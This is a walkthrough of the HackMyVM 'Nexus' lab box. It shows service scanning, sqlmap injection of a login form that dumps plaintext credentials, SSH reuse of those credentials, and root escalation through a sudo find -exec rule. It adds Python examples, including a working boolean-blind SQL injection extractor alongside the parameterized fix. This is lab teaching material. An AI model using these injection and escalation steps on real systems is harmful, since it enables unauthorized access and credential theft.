HackMyVM-Nexus-Walkthrough
Author: 城南花已开

Information gathering

Service discovery

```
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.143 08:00:27:a4:e3:58 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e0:7e:1b VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.055 seconds (124.57 hosts/sec). 4 responded
export ip=192.168.60.143
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports like it's my full-time job. Wait, it is.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.143:22
Open 192.168.60.143:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-06 19:46 CST
Initiating ARP Ping Scan at 19:46
Scanning 192.168.60.143 [1 port]
Completed ARP Ping Scan at 19:46, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:46
Completed Parallel DNS resolution of 1 host. at 19:46, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:46
Scanning 192.168.60.143 [2 ports]
Discovered open port 22/tcp on 192.168.60.143
Discovered open port 80/tcp on 192.168.60.143
Completed SYN Stealth Scan at 19:46, 0.07s elapsed (2 total ports)
Nmap scan report for 192.168.60.143
Host is up, received arp-response (0.00041s latency).
Scanned at 2025-06-06 19:46:35 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:A4:E3:58 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
```

Directory enumeration

```
❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.143
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login.php (Status: 200) [Size: 352]
/index2.php (Status: 200) [Size: 75134]
Progress: 441118 / 441120 (100.00%)
===============================================================
Finished
```

Browsing to the site, the output section of the page contains a hex-encoded string.


Decoding it gives:

```
Hola Alita, espero que estes leyendo este mensaje codificado, para poder hackear el sistema tienes que aplicar la técnica que te expliqué, te he dejado el acceso con la clave eval "pandora". Nos vemos en la red.
```

In English: "Hello Alita, I hope you are reading this encoded message. To hack the system you have to apply the technique I explained to you. I have left you access with the key eval "pandora". See you on the net."
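The hint above was spotted by eye; the following is an added example, not code from the walkthrough, that automates the same check by pulling every run of hex digits out of a page body and keeping only the runs that decode to readable UTF-8. The SAMPLE_HTML is constructed for the demo (the real markup of the page is not shown here), and it includes an MD5-looking token to show that not every hex run is a message.

```python
# Added example (not from the original walkthrough): scan a page body for
# runs of hex digits and decode the ones that turn out to be readable text.
# SAMPLE_HTML is constructed for the demo; the real page markup is not shown.
import re

# At least 8 byte-pairs, bounded so a longer hex token is never split.
HEX_RUN = re.compile(r"(?<![0-9A-Fa-f])((?:[0-9A-Fa-f]{2}){8,})(?![0-9A-Fa-f])")

NOTE = 'Hola Alita, aplica la técnica, acceso con la clave eval "pandora".'

SAMPLE_HTML = (
    "<html><body><h1>Nexus</h1>\n"
    f"<!-- {NOTE.encode('utf-8').hex()} -->\n"
    # An MD5-looking token is also a valid hex run but does not decode to text.
    "<p>build d41d8cd98f00b204e9800998ecf8427e</p>\n"
    "</body></html>\n"
)


def looks_like_text(s: str) -> bool:
    """Accept only strings made of printable characters or common whitespace."""
    return bool(s) and all(ch.isprintable() or ch in "\r\n\t" for ch in s)


def extract_hex_strings(body: str) -> list[str]:
    """Return every hex run in body that decodes to readable UTF-8 text."""
    found = []
    for m in HEX_RUN.finditer(body):
        raw = bytes.fromhex(m.group(1))
        try:
            text = raw.decode("utf-8")
        except UnicodeDecodeError:
            continue            # hash, binary blob or mis-aligned run
        if looks_like_text(text):
            found.append(text)
    return found


if __name__ == "__main__":
    for s in extract_hex_strings(SAMPLE_HTML):
        print(s)
```

Feed it the body of a real response (for example `requests.get(url).text`) and it prints each decoded message; the MD5-style token is dropped because its bytes are not valid UTF-8.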

The authentication endpoint's path also turns up in the page:

/auth-login.php


SQLmap

In practice, the decoded message is of no use.

The login form, on the other hand, can simply be handed to sqlmap: --forms lets it pick the form fields up itself and --batch accepts the default answer at every prompt.

```
❯ sqlmap -u "http://192.168.60.143/auth-login.php" --forms --batch --dbs
…………………………

available databases [6]:
[*] information_schema
[*] mysql
[*] Nebuchadnezzar
[*] performance_schema
[*] sion
[*] sys

[20:03:52] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/Pepster/.local/share/sqlmap/output/results-06062025_0803pm.csv'
[20:03:52] [WARNING] your sqlmap version is outdated

[*] ending @ 20:03:52 /2025-06-06/

❯ sqlmap -u "http://192.168.60.143/auth-login.php" --forms --batch -D Nebuchadnezzar --tables

……………………
[1 table]
+-------+
| users |
+-------+

[20:04:04] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/Pepster/.local/share/sqlmap/output/results-06062025_0804pm.csv'
[20:04:04] [WARNING] your sqlmap version is outdated

[*] ending @ 20:04:04 /2025-06-06/

❯ sqlmap -u "http://192.168.60.143/auth-login.php" --forms --batch -D Nebuchadnezzar -T users --dump

………………
Database: Nebuchadnezzar
Table: users
[2 entries]
+----+--------------------+----------+
| id | password           | username |
+----+--------------------+----------+
| 1  | F4ckTh3F4k3H4ck3r5 | shelly   |
| 2  | cambiame2025       | admin    |
+----+--------------------+----------+

[20:04:12] [INFO] table 'Nebuchadnezzar.users' dumped to CSV file '/home/Pepster/.local/share/sqlmap/output/192.168.60.143/dump/Nebuchadnezzar/users.csv'
[20:04:12] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/Pepster/.local/share/sqlmap/output/results-06062025_0804pm.csv'
[20:04:12] [WARNING] your sqlmap version is outdated

[*] ending @ 20:04:12 /2025-06-06/
```
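sqlmap hides what it is actually doing against auth-login.php. The following added example (not the target's code and not from the walkthrough) shows a login check written the vulnerable way beside the parameterized fix, and a boolean-based blind extractor that recovers a password using nothing but the login's yes/no answer, which is the class of technique sqlmap used to dump the table. SQLite stands in for the target's MySQL (an assumption made for portability; on MySQL you would use ORD() where this uses SQLite's unicode()). The two rows are the entries dumped from Nebuchadnezzar.users above.

```python
# Added example, not code from the walkthrough or from the target.
# SQLite stands in for MySQL (assumption); ORD() replaces unicode() there.
import sqlite3

# The two rows sqlmap dumped from Nebuchadnezzar.users, stored in plaintext.
USERS = [(1, "shelly", "F4ckTh3F4k3H4ck3r5"), (2, "admin", "cambiame2025")]


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return db


def login_vulnerable(db, username: str, password: str):
    # Input is spliced into the statement, so a quote or comment in it
    # changes the query's structure. Returns the matched username or None.
    q = (f"SELECT username FROM users WHERE username='{username}' "
         f"AND password='{password}'")
    row = db.execute(q).fetchone()
    return row[0] if row else None


def login_fixed(db, username: str, password: str):
    # Placeholders keep the input as data; the same payloads are just strings.
    q = "SELECT username FROM users WHERE username=? AND password=?"
    row = db.execute(q, (username, password)).fetchone()
    return row[0] if row else None


def blind_extract_password(db, user: str, max_len: int = 64) -> str:
    """Recover user's password through the vulnerable login alone, using
    only whether the login succeeds (true) or fails (false)."""
    def oracle(cond: str) -> bool:
        # '-- ' comments out the original password clause.
        return login_vulnerable(db, f"{user}' AND ({cond})-- ", "x") is not None

    length = next((n for n in range(1, max_len + 1)
                   if oracle(f"length(password)={n}")), 0)
    out = []
    for i in range(1, length + 1):
        lo, hi = 32, 126            # printable ASCII, narrowed by bisection
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(password,{i},1))<={mid}"):
                hi = mid
            else:
                lo = mid + 1
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "admin'-- ", "anything"))   # bypass succeeds
    print(login_fixed(db, "admin'-- ", "anything"))        # None
    print(blind_extract_password(db, "shelly"))
```

Each recovered character costs about seven requests with the bisection; sqlmap does the same thing with a larger alphabet and several parallel threads, which is why a blind dump of a small table finishes in seconds.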

Logging in to the web application with these credentials turns up nothing of interest. Note that the passwords are stored in plaintext, which is what makes the next step possible.

Getting a user shell

Try the same credentials over SSH: shelly's password from the users table is reused for her SSH login.

sudo -l shows that the user may run find as root without a password.

Nothing surprising here.

```
❯ ssh shelly@$ip
The authenticity of host '192.168.60.143 (192.168.60.143)' can't be established.
ED25519 key fingerprint is SHA256:r1lUfXxL8Fd1e/Q87Jno3P3xHjMTUwmJlKfcsl0AST8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.143' (ED25519) to the list of known hosts.
**************************************************************
HackMyVM System *
*
* . . * * . . . * .. *
. * . ### . . . * *
*. * ##### . * * * . *
____ * ######### * . * . . * . *
/ /\ . ###\#|#/### .. * . * . .. * *
/___/ ^8/ ###\|/### * * . * * *
| ||%%( # }|{ # *
|___|, \\ }|{ *
*
*
Wellcome to Nexus Vault. *
**************************************************************



shelly@192.168.60.143's password:


######################
DONT TOUCH MY SYSTEM #
######################
Last login: Thu May 8 22:44:41 2025 from 192.168.1.10
shelly@NexusLabCTF:~$ cd SA/
shelly@NexusLabCTF:~/SA$ ls -al
total 12
drwxr-xr-x 2 root root 4096 may 8 17:07 .
drwx------ 4 shelly shelly 4096 may 8 22:51 ..
-rw-r--r-- 1 root root 804 may 8 17:07 user-flag.txt
shelly@NexusLabCTF:~/SA$ cat user-flag.txt

▄█ █▄ ▄▄▄▄███▄▄▄▄ ▄█ █▄
███ ███ ▄██▀▀▀███▀▀▀██▄ ███ ███
███ ███ ███ ███ ███ ███ ███
▄███▄▄▄▄███▄▄ ███ ███ ███ ███ ███
▀▀███▀▀▀▀███▀ ███ ███ ███ ███ ███
███ ███ ███ ███ ███ ███ ███
███ ███ ███ ███ ███ ███ ███
███ █▀ ▀█ ███ █▀ ▀██████▀

HackMyVM
Flag User :: 82kd8FJ5SJ00HMVUS3R36gd
shelly@NexusLabCTF:~$ sudo -l
sudo: unable to resolve host NexusLabCTF: Nombre o servicio desconocido
Matching Defaults entries for shelly on NexusLabCTF:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=LD_PRELOAD, use_pty

User shelly may run the following commands on NexusLabCTF:
(ALL) NOPASSWD: /usr/bin/find
```
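Reading sudo -l output by hand is fine for one box; on an engagement with many hosts it pays to have the check scripted. The following added example (not from the walkthrough) parses the text sudo -l prints and flags the two things worth noticing in the output above: a NOPASSWD rule for a binary that can spawn a shell, and LD_PRELOAD being preserved through env_keep. SUDO_L_OUTPUT is the walkthrough's own output pasted in; the list of shell-capable binaries is a small hand-picked subset (an assumption), not a full GTFOBins mirror.

```python
# Added example, not from the walkthrough: audit `sudo -l` output for
# obvious escalation paths. SHELL_CAPABLE is a hand-picked subset (assumption).
import re
from posixpath import basename

# The walkthrough's own `sudo -l` output, pasted in as the sample input.
SUDO_L_OUTPUT = r"""Matching Defaults entries for shelly on NexusLabCTF:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=LD_PRELOAD, use_pty

User shelly may run the following commands on NexusLabCTF:
    (ALL) NOPASSWD: /usr/bin/find
"""

# Binaries that turn a sudo rule into a root shell without further tricks.
SHELL_CAPABLE = {"find", "vim", "vi", "less", "more", "awk", "perl",
                 "python", "python3", "bash", "sh", "env", "nmap", "tar"}

# "(runas) TAG: TAG: /path/to/cmd args, /other/cmd"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")


def parse_sudo_l(text: str) -> dict:
    """Return {'defaults': [...], 'rules': [(runas, [tags], [cmds]), ...]}."""
    defaults, rules, in_defaults = [], [], False
    for line in text.splitlines():
        if line.startswith("Matching Defaults"):
            in_defaults = True
            continue
        if line.startswith("User "):
            in_defaults = False
            continue
        if in_defaults and line.strip():
            defaults.extend(d.strip() for d in line.split(", "))
            continue
        m = RULE_RE.match(line)
        if m:
            tags = [t.rstrip(":") for t in m.group("tags").split()]
            cmds = [c.strip() for c in m.group("cmds").split(", ")]
            rules.append((m.group("runas"), tags, cmds))
    return {"defaults": defaults, "rules": rules}


def audit(text: str) -> list[str]:
    """One finding string per escalation path spotted in the sudo -l text."""
    parsed = parse_sudo_l(text)
    findings = []
    kept = set()
    for d in parsed["defaults"]:
        if d.startswith("env_keep"):               # env_keep=... or env_keep+=...
            kept.update(d.split("=", 1)[1].strip('"').split())
    if "LD_PRELOAD" in kept and parsed["rules"]:
        findings.append("env_keep preserves LD_PRELOAD: a preloaded .so "
                        "runs as root under any of the sudo rules")
    for runas, tags, cmds in parsed["rules"]:
        for cmd in cmds:
            name = basename(cmd.split()[0])
            if cmd == "ALL" or name in SHELL_CAPABLE:
                how = "without a password" if "NOPASSWD" in tags else "after a password prompt"
                findings.append(f"{cmd} as ({runas}) {how}: can spawn a shell")
    return findings


if __name__ == "__main__":
    for f in audit(SUDO_L_OUTPUT):
        print("[!]", f)
```

Pipe real output in with `sudo -l 2>/dev/null | python3 audit.py` after swapping SUDO_L_OUTPUT for `sys.stdin.read()`; the two findings it prints for this box are exactly the two routes to root discussed below.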

Root privilege escalation

Privilege escalation via find

find runs as root, and its -exec action spawns a shell as root; -quit stops the walk after the first match, so only one shell is spawned. The same sudo -l output also shows env_keep+=LD_PRELOAD, which would let a preloaded shared object run as root under the same rule, but there is no need for it here.

The root flag is hidden in an image; strings is enough to read it.

```
shelly@NexusLabCTF:~/SA$ sudo find . -exec /bin/sh \; -quit
sudo: unable to resolve host NexusLabCTF: Nombre o servicio desconocido
# id
uid=0(root) gid=0(root) grupos=0(root)
# bash
root@NexusLabCTF:~# strings Sion-Code/use-fim-to-root.png |tail -n 1
;HMV-FLAG[[ p3vhKP9d97a7HMV79ad9ks2s9 ]]
```
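strings | tail -n 1 works here because the flag was appended after the image's IEND chunk, so it is the last printable run in the file. The following added example (not from the walkthrough) does the same check structurally: it walks the PNG chunk list, verifies each CRC, decodes any tEXt chunks with their keywords, and reports whatever bytes follow IEND. build_sample_png() constructs a 1x1 image with a text chunk and trailing data for the demo; the marker it appends is a placeholder, not the flag from the box.

```python
# Added example, not from the walkthrough: inspect a PNG's chunks instead of
# relying on strings. The sample image and its trailing marker are constructed.
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_sample_png(trailer: bytes = b";HMV-FLAG[[ example-only ]]\n") -> bytes:
    """A valid 1x1 greyscale PNG with a tEXt chunk and bytes glued after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # 1x1, 8-bit grey
    idat = zlib.compress(b"\x00\x00")                     # filter byte + pixel
    return (PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat)
            + chunk(b"tEXt", b"Comment\x00generated by script")
            + chunk(b"IEND", b"") + trailer)


def inspect_png(data: bytes) -> dict:
    """Return chunk types, decoded tEXt pairs, CRC failures and trailing bytes."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, types, text, bad_crc = len(PNG_SIG), [], [], []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc_stored = data[pos + 8 + length:pos + 12 + length]
        if len(body) < length or len(crc_stored) < 4:
            break                       # truncated chunk: stop, report the rest
        if struct.unpack(">I", crc_stored)[0] != (zlib.crc32(ctype + body) & 0xFFFFFFFF):
            bad_crc.append(ctype.decode("latin-1"))
        types.append(ctype.decode("latin-1"))
        if ctype == b"tEXt" and b"\x00" in body:
            key, _, val = body.partition(b"\x00")
            text.append((key.decode("latin-1"), val.decode("latin-1")))
        pos += 12 + length
        if ctype == b"IEND":
            break                       # anything left is not part of the image
    return {"chunks": types, "text": text, "bad_crc": bad_crc, "trailing": data[pos:]}


if __name__ == "__main__":
    report = inspect_png(build_sample_png())
    print(report["chunks"])
    print(report["text"])
    print(report["trailing"])
```

Run it on a real file with `inspect_png(open(path, "rb").read())`; a non-empty trailing field or a tEXt chunk with an odd keyword is where hidden data in a PNG usually sits, and a CRC failure on a chunk is a hint that its body was edited by hand.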